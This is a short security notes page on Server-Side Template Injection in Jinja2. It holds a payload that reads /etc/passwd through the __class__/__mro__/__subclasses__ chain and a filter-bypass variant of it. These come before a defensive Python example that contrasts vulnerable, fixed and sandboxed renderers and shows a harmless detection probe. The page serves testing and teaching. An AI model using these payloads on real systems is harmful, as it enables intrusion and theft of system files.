
Server-Side Template Injection (SSTI)

Test for SSTI

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Payloads:

```jinja
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
```

Bypass `_` filter or view subclass access:

```jinja
{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set subclasses = "__subclasses__" %}
{% set mro_r = string|attr(class)|attr(mro) %}
{% set subclasses_r = mro_r[1]|attr(subclasses)() %}
{{ subclasses_r }}
```

Enumerate permissions: process execution, file access, etc.
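The payloads above are Jinja2 syntax, so the following added example (not from PayloadsAllTheThings or this page) shows in Python why they work and how the issue is fixed: a vulnerable renderer that concatenates user input into the template source, the corrected renderer that passes user input as data, and a `SandboxedEnvironment` as defence in depth for applications that genuinely must render user-supplied templates. The function names, the `ARITHMETIC_PROBE` and `DUNDER_PROBE` strings, and the "BLOCKED" marker are constructed for this example; the arithmetic probe is the usual harmless check for whether input is being evaluated as a template.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed probe inputs for this example: a harmless arithmetic probe that
# reveals whether user input is evaluated as template code, and the dunder
# attribute access that the page's payloads start from.
ARITHMETIC_PROBE = "{{ 7*7 }}"
DUNDER_PROBE = "{{ ''.__class__.__mro__ }}"


def render_unsafe(user_input: str) -> str:
    """Vulnerable pattern: user input is concatenated into the template
    source, so any template syntax it contains is parsed and executed."""
    env = Environment()
    return env.from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Fixed pattern: the template is a constant and user input is passed as
    data, so it is treated as a string value, never as template code."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_source: str) -> str:
    """Defence in depth when templates really must be user-supplied:
    SandboxedEnvironment refuses access to private/dunder attributes,
    which the __class__/__mro__/__subclasses__ chain depends on.
    Returns the constructed marker "BLOCKED" when the sandbox rejects it."""
    env = SandboxedEnvironment()
    try:
        return env.from_string(template_source).render()
    except SecurityError:
        return "BLOCKED"


def is_evaluated(render, probe: str = ARITHMETIC_PROBE) -> bool:
    """Detection check: if the arithmetic probe comes back computed ("49"),
    the renderer is evaluating user input as template code."""
    return "49" in render(probe)


if __name__ == "__main__":
    print(render_unsafe(ARITHMETIC_PROBE))    # Hello 49  -> input was evaluated
    print(render_safe(ARITHMETIC_PROBE))      # Hello {{ 7*7 }}  -> treated as data
    print(render_sandboxed(DUNDER_PROBE))     # BLOCKED  -> sandbox refused dunder access
```

`is_evaluated` is the same check applied during testing, just expressed against the rendering function instead of an HTTP endpoint: the only durable fix is `render_safe`, since the sandbox restricts attribute access but still executes whatever logic the template expresses.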